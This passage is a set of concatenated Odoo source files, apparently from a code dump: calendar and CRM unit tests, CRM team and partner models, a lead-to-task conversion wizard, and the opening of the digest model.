(u'2017-07-10 15:30:00', u'2017-07-10 16:00:00'),
)
def test_event_order(self):
""" check the ordering of events when searching """
def create_event(name, date):
return self.CalendarEvent.create({
'name': name,
'start': date + ' 12:00:00',
'stop': date + ' 14:00:00',
'duration': 2.0,
})
foo1 = create_event('foo', '2011-04-01')
foo2 = create_event('foo', '2011-06-01')
bar1 = create_event('bar', '2011-05-01')
bar2 = create_event('bar', '2011-06-01')
domain = [('id', 'in', (foo1 + foo2 + bar1 + bar2).ids)]
# sort them by name only
events = self.CalendarEvent.search(domain, order='name')
self.assertEqual(events.mapped('name'), ['bar', 'bar', 'foo', 'foo'])
events = self.CalendarEvent.search(domain, order='name desc')
self.assertEqual(events.mapped('name'), ['foo', 'foo', 'bar', 'bar'])
# sort them by start date only
events = self.CalendarEvent.search(domain, order='start')
self.assertEqual(events.mapped('start'), (foo1 + bar1 + foo2 + bar2).mapped('start'))
events = self.CalendarEvent.search(domain, order='start desc')
self.assertEqual(events.mapped('start'), (foo2 + bar2 + bar1 + foo1).mapped('start'))
# sort them by name then start date
events = self.CalendarEvent.search(domain, order='name asc, start asc')
self.assertEqual(list(events), [bar1, bar2, foo1, foo2])
events = self.CalendarEvent.search(domain, order='name asc, start desc')
self.assertEqual(list(events), [bar2, bar1, foo2, foo1])
events = self.CalendarEvent.search(domain, order='name desc, start asc')
self.assertEqual(list(events), [foo1, foo2, bar1, bar2])
events = self.CalendarEvent.search(domain, order='name desc, start desc')
self.assertEqual(list(events), [foo2, foo1, bar2, bar1])
# sort them by start date then name
events = self.CalendarEvent.search(domain, order='start asc, name asc')
self.assertEqual(list(events), [foo1, bar1, bar2, foo2])
events = self.CalendarEvent.search(domain, order='start asc, name desc')
self.assertEqual(list(events), [foo1, bar1, foo2, bar2])
events = self.CalendarEvent.search(domain, order='start desc, name asc')
self.assertEqual(list(events), [bar2, foo2, bar1, foo1])
events = self.CalendarEvent.search(domain, order='start desc, name desc')
self.assertEqual(list(events), [foo2, bar2, bar1, foo1])
def test_event_activity(self):
# ensure meeting activity type exists
meeting_act_type = self.env['mail.activity.type'].search([('category', '=', 'meeting')], limit=1)
if not meeting_act_type:
meeting_act_type = self.env['mail.activity.type'].create({
'name': 'Meeting Test',
'category': 'meeting',
})
# have a test model inheriting from activities
test_record = self.env['res.partner'].create({
'name': 'Test',
})
now = datetime.now()
test_user = self.env.ref('base.user_demo')
test_name, test_description, test_description2 = 'Test-Meeting', '<p>Test-Description</p>', '<p>NotTest</p>'
# create using default_* keys
test_event = self.env['calendar.event'].sudo(test_user).with_context(
default_res_model=test_record._name,
default_res_id=test_record.id,
).create({
'name': test_name,
'description': test_description,
'start': fields.Datetime.to_string(now + timedelta(days=-1)),
'stop': fields.Datetime.to_string(now + timedelta(hours=2)),
'user_id': self.env.user.id,
})
self.assertEqual(test_event.res_model, test_record._name)
self.assertEqual(test_event.res_id, test_record.id)
self.assertEqual(len(test_record.activity_ids), 1)
self.assertEqual(test_record.activity_ids.summary, test_name)
self.assertEqual(test_record.activity_ids.note, test_description)
self.assertEqual(test_record.activity_ids.user_id, self.env.user)
self.assertEqual(test_record.activity_ids.date_deadline, (now + timedelta(days=-1)).date())
# updating event should update activity
test_event.write({
'name': '%s2' % test_name,
'description': test_description2,
'start': fields.Datetime.to_string(now + timedelta(days=-2)),
'user_id': test_user.id,
})
self.assertEqual(test_record.activity_ids.summary, '%s2' % test_name)
self.assertEqual(test_record.activity_ids.note, test_description2)
self.assertEqual(test_record.activity_ids.user_id, test_user)
self.assertEqual(test_record.activity_ids.date_deadline, (now + timedelta(days=-2)).date())
# deleting meeting should delete its activity
test_record.activity_ids.unlink()
self.assertEqual(self.env['calendar.event'], self.env['calendar.event'].search([('name', '=', test_name)]))
# create using active_model keys
test_event = self.env['calendar.event'].sudo(self.env.ref('base.user_demo')).with_context(
active_model=test_record._name,
active_id=test_record.id,
).create({
'name': test_name,
'description': test_description,
'start': now + timedelta(days=-1),
'stop': now + timedelta(hours=2),
'user_id': self.env.user.id,
})
self.assertEqual(test_event.res_model, test_record._name)
self.assertEqual(test_event.res_id, test_record.id)
self.assertEqual(len(test_record.activity_ids), 1)
def test_event_allday(self):
self.env.user.tz = 'Pacific/Honolulu'
event = self.CalendarEvent.create({
'name': '<NAME>',
'start': "2018-10-16 00:00:00",
'start_date': "2018-10-16",
'start_datetime': False,
'stop': "2018-10-18 00:00:00",
'stop_date': "2018-10-18",
'stop_datetime': False,
'allday': True,
})
self.assertEqual(str(event.start), '2018-10-16 08:00:00')
self.assertEqual(str(event.stop), '2018-10-18 18:00:00')
def test_recurring_around_dst(self):
m = self.CalendarEvent.create({
'name': "wheee",
'start': '2018-10-27 14:30:00',
'allday': False,
'rrule': u'FREQ=DAILY;INTERVAL=1;COUNT=4',
'duration': 2,
'stop': '2018-10-27 16:30:00',
})
start_recurring_dates = m.with_context({'tz': 'Europe/Brussels'})._get_recurrent_date_by_event()
self.assertEqual(len(start_recurring_dates), 4)
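# The event starts at 14:30 UTC, i.e. 16:30 in Europe/Brussels (CEST, UTC+2); after the switch to winter time (CET, UTC+1) on 2018-10-28, keeping 16:30 local time corresponds to 15:30 UTC, hence the hour assertions below.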
for d in start_recurring_dates:
self.assertEqual(d.tzinfo, pytz.UTC)
if d.day < 28: # DST switch happens between 2018-10-27 and 2018-10-28
self.assertEqual(d.hour, 14)
else:
self.assertEqual(d.hour, 15)
self.assertEqual(d.minute, 30)
def test_event_activity_timezone(self):
activty_type = self.env['mail.activity.type'].create({
'name': 'Meeting',
'category': 'meeting'
})
activity_id = self.env['mail.activity'].create({
'summary': 'Meeting with partner',
'activity_type_id': activty_type.id,
'res_model_id': self.env['ir.model'].search([('model', '=', 'res.partner')], limit=1).id,
'res_id': self.env['res.partner'].search([('name', 'ilike', 'Deco Addict')], limit=1).id,
})
calendar_event = self.env['calendar.event'].create({
'name': 'Meeting with partner',
'activity_ids': [(6, False, activity_id.ids)],
'start': '2018-11-12 21:00:00',
'stop': '2018-11-13 00:00:00',
})
# Check output in UTC
self.assertEqual(str(activity_id.date_deadline), '2018-11-12')
# Check output in the user's tz
# write on the event to trigger sync of activities
calendar_event.with_context({'tz': 'Australia/Brisbane'}).write({
'start': '2018-11-12 21:00:00',
})
self.assertEqual(str(activity_id.date_deadline), '2018-11-13')
def test_event_allday_activity_timezone(self):
# Covers use case of commit eef4c3b48bcb4feac028bf640b545006dd0c9b91
# Also, read the comment in the code at calendar.event._inverse_dates
activty_type = self.env['mail.activity.type'].create({
'name': 'Meeting',
'category': 'meeting'
})
activity_id = self.env['mail.activity'].create({
'summary': 'Meeting with partner',
'activity_type_id': activty_type.id,
'res_model_id': self.env['ir.model'].search([('model', '=', 'res.partner')], limit=1).id,
'res_id': self.env['res.partner'].search([('name', 'ilike', '<NAME>')], limit=1).id,
})
calendar_event = self.env['calendar.event'].create({
'name': '<NAME>',
'start': "2018-10-16 00:00:00",
'start_date': "2018-10-16",
'start_datetime': False,
'stop': "2018-10-18 00:00:00",
'stop_date': "2018-10-18",
'stop_datetime': False,
'allday': True,
'activity_ids': [(6, False, activity_id.ids)],
})
# Check output in UTC
self.assertEqual(str(activity_id.date_deadline), '2018-10-16')
# Check output in the user's tz
# write on the event to trigger sync of activities
calendar_event.with_context({'tz': 'Pacific/Honolulu'}).write({
'start': '2018-10-16 00:00:00',
'start_date': '2018-10-16',
})
self.assertEqual(str(activity_id.date_deadline), '2018-10-16')
def test_event_creation_mail(self):
"""
Check that mail are sent to the attendees on event creation
Check that mail are sent to the added attendees on event edit
Check that mail are NOT sent to the attendees when detaching a recurring event
"""
def _test_one_mail_per_attendee(self, m, partners):
# check that every attendee receive a (single) mail for the event
for partner in partners:
mail = self.env['mail.mail'].search([
('recipient_ids', 'in', partner.id),
('subject', 'like', m.name),
])
self.assertEqual(len(mail), 1)
partners = [
self.env['res.partner'].create({'name':'testuser0','email': u'<EMAIL>'}),
self.env['res.partner'].create({'name':'testuser1','email': u'<EMAIL>'}),
]
partner_ids = [(6, False, [p.id for p in partners]),]
now = fields.Datetime.now()
m = self.CalendarEvent.create({
'name': "mailTest1",
'allday': False,
'rrule': u'FREQ=DAILY;INTERVAL=1;COUNT=5',
'duration': 0.5,
'partner_ids': partner_ids,
'start': fields.Datetime.to_string(now + timedelta(days=10)),
'stop': fields.Datetime.to_string(now + timedelta(days=15)),
})
# every partner should have 1 mail sent
_test_one_mail_per_attendee(self, m, partners)
# adding more partners to the event
partners.extend([
self.env['res.partner'].create({'name':'testuser2','email': u'<EMAIL>'}),
self.env['res.partner'].create({'name':'testuser3','email': u'<EMAIL>'}),
self.env['res.partner'].create({'name':'testuser4','email': u'<EMAIL>'}),
])
partner_ids = [(6, False, [p.id for p in partners]),]
m.write({'partner_ids': partner_ids})
# more email should be sent
_test_one_mail_per_attendee(self, m, partners)
# calculate virtualid to detach one event
virtid = str(m.id) + '-' + ''.join(re.split('[\D]', fields.Datetime.to_string(now + timedelta(days=12))))
# detaching a virtual event in the chain
self.env['calendar.event'].browse(virtid).detach_recurring_event(values={'active':False})
# since the detach actually creates an event in the backend
# we check that no mail notifications are sent to the attendees
_test_one_mail_per_attendee(self, m, partners)
```
#### File: crm/models/crm_team.py
```python
from dateutil.relativedelta import relativedelta
from odoo import api, fields, models, _
from odoo.tools.safe_eval import safe_eval
from odoo.exceptions import ValidationError
class Team(models.Model):
_name = 'crm.team'
_inherit = ['mail.alias.mixin', 'crm.team']
_description = 'Sales Channels'
use_leads = fields.Boolean('Leads', help="Check this box to filter and qualify incoming requests as leads before converting them into opportunities and assigning them to a salesperson.")
use_opportunities = fields.Boolean('Pipeline', help="Check this box to manage a presales process with opportunities.")
alias_id = fields.Many2one('mail.alias', string='Alias', ondelete="restrict", required=True, help="The email address associated with this channel. New emails received will automatically create new leads assigned to the channel.")
unassigned_leads_count = fields.Integer(
compute='_compute_unassigned_leads_count',
string='Unassigned Leads', readonly=True)
opportunities_count = fields.Integer(
compute='_compute_opportunities',
string='Number of open opportunities', readonly=True)
opportunities_amount = fields.Integer(
compute='_compute_opportunities',
string='Opportunities Revenues', readonly=True)
dashboard_graph_model = fields.Selection(selection_add=[('crm.lead', 'Pipeline')])
dashboard_graph_period_pipeline = fields.Selection([
('week', 'Within a Week'),
('month', 'Within a Month'),
('year', 'Within a Year'),
], string='Expected to Close', help="The time period this channel's dashboard graph will consider.",
compute="_compute_dashboard_graph_period_pipeline", inverse="_inverse_dashboard_graph_period_pipeline")
dashboard_graph_group_pipeline = fields.Selection([
('day', 'Expected Closing Day'),
('week', 'Expected Closing Week'),
('month', 'Expected Closing Month'),
('user', 'Salesperson'),
('stage', 'Stage'),
], string='Grouping Method', default='day', help="How this channel's dashboard graph will group the results.")
def _compute_unassigned_leads_count(self):
leads_data = self.env['crm.lead'].read_group([
('team_id', 'in', self.ids),
('type', '=', 'lead'),
('user_id', '=', False),
], ['team_id'], ['team_id'])
counts = {datum['team_id'][0]: datum['team_id_count'] for datum in leads_data}
for team in self:
team.unassigned_leads_count = counts.get(team.id, 0)
def _compute_opportunities(self):
opportunity_data = self.env['crm.lead'].search([
('team_id', 'in', self.ids),
('probability', '<', 100),
('type', '=', 'opportunity'),
]).read(['planned_revenue', 'probability', 'team_id'])
counts = {}
amounts = {}
for datum in opportunity_data:
counts.setdefault(datum['team_id'][0], 0)
amounts.setdefault(datum['team_id'][0], 0)
counts[datum['team_id'][0]] += 1
amounts[datum['team_id'][0]] += (datum.get('planned_revenue', 0) * datum.get('probability', 0) / 100.0)
for team in self:
team.opportunities_count = counts.get(team.id, 0)
team.opportunities_amount = amounts.get(team.id, 0)
def _compute_dashboard_graph_period_pipeline(self):
for channel in self:
channel.dashboard_graph_period_pipeline = channel.dashboard_graph_period
def _inverse_dashboard_graph_period_pipeline(self):
for channel in self.filtered(lambda ch: ch.dashboard_graph_model == 'crm.lead'):
channel.dashboard_graph_period = channel.dashboard_graph_period_pipeline
def get_alias_model_name(self, vals):
return 'crm.lead'
def get_alias_values(self):
has_group_use_lead = self.env.user.has_group('crm.group_use_lead')
values = super(Team, self).get_alias_values()
values['alias_defaults'] = defaults = safe_eval(self.alias_defaults or "{}")
defaults['type'] = 'lead' if has_group_use_lead and self.use_leads else 'opportunity'
defaults['team_id'] = self.id
return values
@api.onchange('use_leads', 'use_opportunities')
def _onchange_use_leads_opportunities(self):
if not self.use_leads and not self.use_opportunities:
self.alias_name = False
if not self.use_opportunities and self.use_leads:
self.use_leads = False
@api.onchange('team_type')
def _onchange_team_type(self):
if self.team_type == 'sales':
self.use_opportunities = True
self.use_leads = self.user_has_groups('crm.group_use_lead')
self.dashboard_graph_model = 'crm.lead'
else:
self.use_opportunities = False
self.use_leads = False
return super(Team, self)._onchange_team_type()
@api.onchange('dashboard_graph_model')
def _onchange_dashboard_graph_model(self):
if self.dashboard_graph_model == 'crm.lead':
self.dashboard_graph_period_pipeline = self.dashboard_graph_period
self.dashboard_graph_group_pipeline = self.dashboard_graph_group
else:
self.dashboard_graph_period = self.dashboard_graph_period_pipeline
if not self.dashboard_graph_group:
self.dashboard_graph_group = self._fields['dashboard_graph_group'].default(self)
@api.onchange('dashboard_graph_group_pipeline')
def _onchange_dashboard_graph_group_pipeline(self):
if self.dashboard_graph_group_pipeline == 'stage':
self.dashboard_graph_group = False
else:
self.dashboard_graph_group = self.dashboard_graph_group_pipeline
@api.constrains('dashboard_graph_model', 'use_opportunities')
def _check_graph_model(self):
if not self.use_opportunities and self.dashboard_graph_model == 'crm.lead':
raise ValidationError(_("You have to enable the Pipeline on your Sales Team to be able to set it as a content for the graph"))
@api.multi
def write(self, vals):
result = super(Team, self).write(vals)
if 'use_leads' in vals or 'alias_defaults' in vals:
for team in self:
team.alias_id.write(team.get_alias_values())
return result
#TODO JEM : refactor this stuff with xml action, proper customization,
@api.model
def action_your_pipeline(self):
action = self.env.ref('crm.crm_lead_opportunities_tree_view').read()[0]
user_team_id = self.env.user.sale_team_id.id
if not user_team_id:
user_team_id = self.search([], limit=1).id
action['help'] = _("""<p class='o_view_nocontent_smiling_face'>Add new opportunities</p><p>
Looks like you are not a member of a Sales Team. You should add yourself
as a member of one of the Sales Teams.
</p>""")
if user_team_id:
action['help'] += "<p>As you don't belong to any Sales Team, Odoo opens the first one by default.</p>"
action_context = safe_eval(action['context'], {'uid': self.env.uid})
if user_team_id:
action_context['default_team_id'] = user_team_id
action['context'] = action_context
return action
def _compute_dashboard_button_name(self):
opportunity_teams = self.filtered('use_opportunities')
opportunity_teams.update({'dashboard_button_name': _("Pipeline")})
super(Team, self - opportunity_teams)._compute_dashboard_button_name()
def action_primary_channel_button(self):
if self.use_opportunities:
action = self.env.ref('crm.crm_case_form_view_salesteams_opportunity').read()[0]
return action
return super(Team, self).action_primary_channel_button()
def _graph_get_dates(self, today):
""" return a coherent start and end date for the dashboard graph according to the graph settings.
"""
if self.dashboard_graph_model == 'crm.lead':
if self.dashboard_graph_group == 'month':
start_date = today.replace(day=1)
elif self.dashboard_graph_group == 'week':
start_date = today - relativedelta(days=today.isocalendar()[2] - 1)
else:
start_date = today
if self.dashboard_graph_period == 'week':
end_date = today + relativedelta(weeks=1)
elif self.dashboard_graph_period == 'year':
end_date = today + relativedelta(years=1)
else:
end_date = today + relativedelta(months=1)
# we take the end of the preceding month/week/day if we group by month/week/day
# (to avoid having twice the same month/week/day from different years/month/week)
if self.dashboard_graph_group == 'month':
end_date = end_date.replace(day=1) - relativedelta(days=1)
elif self.dashboard_graph_group == 'week':
end_date -= relativedelta(days=end_date.isocalendar()[2])
else:
end_date -= relativedelta(days=1)
return [start_date, end_date]
return super(Team, self)._graph_get_dates(today)
def _get_graph(self):
graph_datas = super(Team, self)._get_graph()
if self.dashboard_graph_model == 'crm.lead' and self.dashboard_graph_group_pipeline == 'stage':
stage_ids = [d['label'] for d in graph_datas[0]['values'] if d['label'] is not None]
stage_data = self.env['crm.stage'].browse(stage_ids).read(['sequence', 'name'])
stage_data = {d['id']: {'name': d['name'], 'sequence': d['sequence']} for d in stage_data}
# use "Undefined" stage for unset stage records
stage_data[None] = {'name': _('Undefined'), 'sequence': -1}
graph_datas[0]['values'] = sorted(graph_datas[0]['values'], key=lambda el: stage_data[el['label']]['sequence'])
for gdata in graph_datas[0]['values']:
gdata['label'] = stage_data[gdata['label']]['name']
return graph_datas
def _graph_date_column(self):
if self.dashboard_graph_model == 'crm.lead':
return 'date_deadline'
return super(Team, self)._graph_date_column()
def _graph_x_query(self):
if self.dashboard_graph_model == 'crm.lead' and self.dashboard_graph_group_pipeline == 'stage':
return 'stage_id'
return super(Team, self)._graph_x_query()
def _graph_y_query(self):
if self.dashboard_graph_model == 'crm.lead':
return 'SUM(expected_revenue)'
return super(Team, self)._graph_y_query()
def _graph_title_and_key(self):
if self.dashboard_graph_model == 'crm.lead':
return ['', _('Pipeline: Expected Revenue')] # no more title
return super(Team, self)._graph_title_and_key()
```
#### File: crm/models/res_partner.py
```python
from odoo import api, fields, models
class Partner(models.Model):
_inherit = 'res.partner'
team_id = fields.Many2one('crm.team', string='Sales Team', oldname='section_id')
opportunity_ids = fields.One2many('crm.lead', 'partner_id', string='Opportunities', domain=[('type', '=', 'opportunity')])
meeting_ids = fields.Many2many('calendar.event', 'calendar_event_res_partner_rel', 'res_partner_id', 'calendar_event_id', string='Meetings', copy=False)
opportunity_count = fields.Integer("Opportunity", compute='_compute_opportunity_count')
meeting_count = fields.Integer("# Meetings", compute='_compute_meeting_count')
@api.model
def default_get(self, fields):
rec = super(Partner, self).default_get(fields)
active_model = self.env.context.get('active_model')
if active_model == 'crm.lead':
lead = self.env[active_model].browse(self.env.context.get('active_id')).exists()
if lead:
rec.update(
phone=lead.phone,
mobile=lead.mobile,
function=lead.function,
title=lead.title.id,
website=lead.website,
street=lead.street,
street2=lead.street2,
city=lead.city,
state_id=lead.state_id.id,
country_id=lead.country_id.id,
zip=lead.zip,
)
return rec
@api.multi
def _compute_opportunity_count(self):
for partner in self:
            operator = 'child_of' if partner.is_company else '='  # the opportunity count should count the opportunities of this company and all its contacts
partner.opportunity_count = self.env['crm.lead'].search_count([('partner_id', operator, partner.id), ('type', '=', 'opportunity')])
@api.multi
def _compute_meeting_count(self):
for partner in self:
partner.meeting_count = len(partner.meeting_ids)
@api.multi
def schedule_meeting(self):
partner_ids = self.ids
partner_ids.append(self.env.user.partner_id.id)
action = self.env.ref('calendar.action_calendar_event').read()[0]
action['context'] = {
'search_default_partner_ids': self._context['partner_name'],
'default_partner_ids': partner_ids,
}
return action
```
#### File: crm_project/wizard/crm_lead_convert2task.py
```python
from odoo import api, fields, models
class CrmLeadConvert2Task(models.TransientModel):
""" wizard to convert a Lead into a Project task and move the Mail Thread """
_name = "crm.lead.convert2task"
_inherit = 'crm.partner.binding'
_description = 'Lead convert to Task'
@api.model
def default_get(self, fields):
result = super(CrmLeadConvert2Task, self).default_get(fields)
lead_id = self.env.context.get('active_id')
if lead_id:
result['lead_id'] = lead_id
return result
lead_id = fields.Many2one('crm.lead', string='Lead', domain=[('type', '=', 'lead')])
project_id = fields.Many2one('project.project', string='Project')
@api.multi
def action_lead_to_project_task(self):
self.ensure_one()
# get the lead to transform
lead = self.lead_id
partner_id = self._find_matching_partner()
if not partner_id and (lead.partner_name or lead.contact_name):
partner_id = lead.handle_partner_assignation()[lead.id]
# create new project.task
vals = {
"name": lead.name,
"description": lead.description,
"email_from": lead.email_from,
"project_id": self.project_id.id,
"partner_id": partner_id,
"user_id": None
}
task = self.env['project.task'].create(vals)
# move the mail thread
lead.message_change_thread(task)
# move attachments
attachments = self.env['ir.attachment'].search([('res_model', '=', 'crm.lead'), ('res_id', '=', lead.id)])
attachments.write({'res_model': 'project.task', 'res_id': task.id})
# archive the lead
lead.write({'active': False})
# return the action to go to the form view of the new Task
view = self.env.ref('project.view_task_form2')
return {
'name': 'Task created',
'view_type': 'form',
'view_mode': 'form',
'view_id': view.id,
'res_model': 'project.task',
'type': 'ir.actions.act_window',
'res_id': task.id,
'context': self.env.context
}
```
#### File: crm/tests/test_crm_activity.py
```python
from .common import TestCrmCases
from odoo import fields
from datetime import datetime, timedelta
class TestCrmMailActivity(TestCrmCases):
def setUp(self):
super(TestCrmMailActivity, self).setUp()
# Set up activities
lead_model_id = self.env['ir.model']._get('crm.lead').id
ActivityType = self.env['mail.activity.type']
self.activity3 = ActivityType.create({
'name': 'Celebrate the sale',
'delay_count': 3,
'summary': 'ACT 3 : Beers for everyone because I am a good salesman !',
'res_model_id': lead_model_id,
})
self.activity2 = ActivityType.create({
'name': 'Call for Demo',
'delay_count': 6,
'summary': 'ACT 2 : I want to show you my ERP !',
'res_model_id': lead_model_id,
})
self.activity1 = ActivityType.create({
'name': 'Initial Contact',
'delay_count': 5,
'summary': 'ACT 1 : Presentation, barbecue, ... ',
'res_model_id': lead_model_id,
})
# I create an opportunity, as salesman
self.partner_client = self.env.ref("base.res_partner_1")
self.lead = self.env['crm.lead'].sudo(self.crm_salesman.id).create({
'name': '<NAME>',
'type': 'opportunity',
'partner_id': self.partner_client.id,
'team_id': self.env.ref("sales_team.team_sales_department").id,
'user_id': self.crm_salesman.id,
})
def test_crm_activity_recipients(self):
""" This test case checks
- no internal subtype followed by client
- activity subtype are not default ones
- only activity followers are recipients when this kind of activity is logged
"""
# Activity I'm going to log
activity = self.activity2
        # Explicitly add the client as a follower
self.lead.message_subscribe([self.partner_client.id])
# Check the client is not follower of any internal subtype
internal_subtypes = self.lead.message_follower_ids.filtered(lambda fol: fol.partner_id == self.partner_client).mapped('subtype_ids').filtered(lambda subtype: subtype.internal)
self.assertFalse(internal_subtypes)
# Add sale manager as follower of default subtypes
self.lead.message_subscribe([self.crm_salemanager.partner_id.id], subtype_ids=[self.env.ref('mail.mt_activities').id, self.env.ref('mail.mt_comment').id])
activity = self.env['mail.activity'].sudo(self.crm_salesman.id).create({
'activity_type_id': self.activity1.id,
'note': 'Content of the activity to log',
'res_id': self.lead.id,
'res_model_id': self.env.ref('crm.model_crm_lead').id,
})
activity._onchange_activity_type_id()
self.assertEqual(self.lead.activity_type_id, self.activity1)
self.assertEqual(self.lead.activity_summary, self.activity1.summary)
# self.assertEqual(self.lead.activity_date_deadline, self.activity1.summary)
# mark as done, check lead and posted message
activity.action_done()
self.assertFalse(self.lead.activity_type_id.id)
self.assertFalse(self.lead.activity_ids)
activity_message = self.lead.message_ids[0]
self.assertEqual(activity_message.needaction_partner_ids, self.crm_salemanager.partner_id)
self.assertEqual(activity_message.subtype_id, self.env.ref('mail.mt_activities'))
def test_crm_activity_next_action(self):
""" This test case set the next activity on a lead, log another, and schedule a third. """
# Add the next activity (like we set it from a form view)
lead_model_id = self.env['ir.model']._get('crm.lead').id
activity = self.env['mail.activity'].sudo(self.crm_salesman.id).create({
'activity_type_id': self.activity1.id,
'summary': 'My Own Summary',
'res_id': self.lead.id,
'res_model_id': lead_model_id,
})
activity._onchange_activity_type_id()
# Check the next activity is correct
self.assertEqual(self.lead.activity_summary, activity.summary)
self.assertEqual(self.lead.activity_type_id, activity.activity_type_id)
# self.assertEqual(fields.Datetime.from_string(self.lead.activity_date_deadline), datetime.now() + timedelta(days=activity.activity_type_id.days))
activity.write({
'activity_type_id': self.activity2.id,
'summary': '',
'note': 'Content of the activity to log',
})
activity._onchange_activity_type_id()
self.assertEqual(self.lead.activity_summary, activity.activity_type_id.summary)
self.assertEqual(self.lead.activity_type_id, activity.activity_type_id)
# self.assertEqual(fields.Datetime.from_string(self.lead.activity_date_deadline), datetime.now() + timedelta(days=activity.activity_type_id.days))
activity.action_done()
# Check the next activity on the lead has been removed
self.assertFalse(self.lead.activity_type_id)
```
#### File: crm/tests/test_new_lead_notification.py
```python
from .common import TestCrmCases
class NewLeadNotification(TestCrmCases):
def test_new_lead_notification(self):
""" Test newly create leads like from the website. People and channels
subscribed to the Sales Team shoud be notified. """
# subscribe a partner and a channel to the Sales Team with new lead subtype
channel_listen = self.env['mail.channel'].create({'name': 'Listener'})
sales_team_1 = self.env['crm.team'].create({
'name': 'Test Sales Team',
'alias_name': 'test_sales_team',
})
subtype = self.env.ref("crm.mt_salesteam_lead")
sales_team_1.message_subscribe(partner_ids=[self.crm_salesman.partner_id.id], channel_ids=[channel_listen.id], subtype_ids=[subtype.id])
# Imitate what happens in the controller when somebody creates a new
# lead from the website form
lead = self.env["crm.lead"].with_context(mail_create_nosubscribe=True).sudo().create({
"contact_name": "Somebody",
"description": "Some question",
"email_from": "<EMAIL>",
"name": "<NAME>",
"partner_name": "Some company",
"team_id": sales_team_1.id,
"phone": "+0000000000"
})
# partner and channel should be auto subscribed
self.assertIn(self.crm_salesman.partner_id, lead.message_partner_ids)
self.assertIn(channel_listen, lead.message_channel_ids)
msg = lead.message_ids[0]
self.assertIn(self.crm_salesman.partner_id, msg.needaction_partner_ids)
self.assertIn(channel_listen, msg.channel_ids)
# The user should have a new unread message
lead_user = lead.sudo(self.crm_salesman)
self.assertTrue(lead_user.message_needaction)
def test_new_lead_from_email_multicompany(self):
company0 = self.env.user.company_id
company1 = self.env['res.company'].create({'name': 'new_company'})
self.env.user.write({
'company_ids': [(4, company0.id, False), (4, company1.id, False)],
})
crm_team_model = self.env['ir.model'].search([('model', '=', 'crm.team')])
crm_lead_model = self.env['ir.model'].search([('model', '=', 'crm.lead')])
self.env["ir.config_parameter"].sudo().set_param("mail.catchall.domain", 'aqualung.com')
crm_team0 = self.env['crm.team'].create({
'name': 'crm team 0',
'company_id': company0.id,
})
crm_team1 = self.env['crm.team'].create({
'name': 'crm team 1',
'company_id': company1.id,
})
mail_alias0 = self.env['mail.alias'].create({
'alias_name': 'sale_team_0',
'alias_model_id': crm_lead_model.id,
'alias_parent_model_id': crm_team_model.id,
'alias_parent_thread_id': crm_team0.id,
'alias_defaults': "{'type': 'opportunity', 'team_id': %s}" % crm_team0.id,
})
mail_alias1 = self.env['mail.alias'].create({
'alias_name': 'sale_team_1',
'alias_model_id': crm_lead_model.id,
'alias_parent_model_id': crm_team_model.id,
'alias_parent_thread_id': crm_team1.id,
'alias_defaults': "{'type': 'opportunity', 'team_id': %s}" % crm_team1.id,
})
crm_team0.write({'alias_id': mail_alias0.id})
crm_team1.write({'alias_id': mail_alias1.id})
new_message0 = """MIME-Version: 1.0
Date: Thu, 27 Dec 2018 16:27:45 +0100
Message-ID: blablabla0
Subject: sale team 0 in company 0
From: A client <<EMAIL>>
To: <EMAIL>
Content-Type: multipart/alternative; boundary="000000000000a47519057e029630"
--000000000000a47519057e029630
Content-Type: text/plain; charset="UTF-8"
--000000000000a47519057e029630
Content-Type: text/html; charset="UTF-8"
Content-Transfer-Encoding: quoted-printable
<div>A good message</div>
--000000000000a47519057e029630--
"""
new_message1 = """MIME-Version: 1.0
Date: Thu, 27 Dec 2018 16:27:45 +0100
Message-ID: blablabla1
Subject: sale team 1 in company 1
From: B client <<EMAIL>>
To: <EMAIL>
Content-Type: multipart/alternative; boundary="000000000000a47519057e029630"
--000000000000a47519057e029630
Content-Type: text/plain; charset="UTF-8"
--000000000000a47519057e029630
Content-Type: text/html; charset="UTF-8"
Content-Transfer-Encoding: quoted-printable
<div>A good message bis</div>
--000000000000a47519057e029630--
"""
crm_lead0_id = self.env['mail.thread'].message_process('crm.lead', new_message0)
crm_lead1_id = self.env['mail.thread'].message_process('crm.lead', new_message1)
crm_lead0 = self.env['crm.lead'].browse(crm_lead0_id)
crm_lead1 = self.env['crm.lead'].browse(crm_lead1_id)
self.assertEqual(crm_lead0.team_id, crm_team0)
self.assertEqual(crm_lead1.team_id, crm_team1)
self.assertEqual(crm_lead0.company_id, company0)
self.assertEqual(crm_lead1.company_id, company1)
```
#### File: addons/decimal_precision/__init__.py
```python
from odoo import api, SUPERUSER_ID
from . import models
def get_precision(application):
def change_digit(cr):
env = api.Environment(cr, SUPERUSER_ID, {})
precision = env['decimal.precision'].precision_get(application)
return 16, precision
return change_digit
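# Typical usage sketch (illustrative, not part of the original file): other modules
# pass the returned callable as the ``digits`` argument of a Float field, e.g.
#   import odoo.addons.decimal_precision as dp
#   price = fields.Float(digits=dp.get_precision('Product Price'))
# The precision is then resolved lazily against the 'decimal.precision' records.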
```
#### File: delivery/models/res_config_settings.py
```python
from odoo import models
class ResConfigSettings(models.TransientModel):
_inherit = 'res.config.settings'
def set_values(self):
super(ResConfigSettings, self).set_values()
rule = self.env.ref('delivery.delivery_carrier_comp_rule', False)
if rule:
rule.write({'active': not bool(self.company_share_product)})
```
#### File: digest/models/digest.py
```python
import logging
import math
import pytz
from datetime import datetime, date
from dateutil.relativedelta import relativedelta
from odoo import api, fields, models, tools
from odoo.addons.base.models.ir_mail_server import MailDeliveryException
from odoo.exceptions import AccessError
from odoo.tools.float_utils import float_round
_logger = logging.getLogger(__name__)
class Digest(models.Model):
_name = 'digest.digest'
_description = 'Digest'
# Digest description
name = fields.Char(string='Name', required=True, translate=True)
user_ids = fields.Many2many('res.users', string='Recipients', domain="[('share', '=', False)]")
periodicity = fields.Selection([('weekly', 'Weekly'),
('monthly', 'Monthly'),
('quarterly', 'Quarterly')],
string='Periodicity', default='weekly', required=True)
next_run_date = fields.Date(string='Next Send Date')
template_id = fields.Many2one('mail.template', string='Email Template',
domain="[('model','=','digest.digest')]",
default=lambda self: self.env.ref('digest.digest_mail_template'),
required=True)
currency_id = fields.Many2one(related="company_id.currency_id", string='Currency', readonly=False)
company_id = fields.Many2one('res.company', string='Company', default=lambda self: self.env.user.company_id.id)
available_fields = fields.Char(compute='_compute_available_fields')
is_subscribed = fields.Boolean('Is user subscribed', compute='_compute_is_subscribed')
state = fields.Selection([('activated', 'Activated'), ('deactivated', 'Deactivated')], string='Status', readonly=True, default='activated')
# First base-related KPIs
kpi_res_users_connected = fields.Boolean('Connected Users')
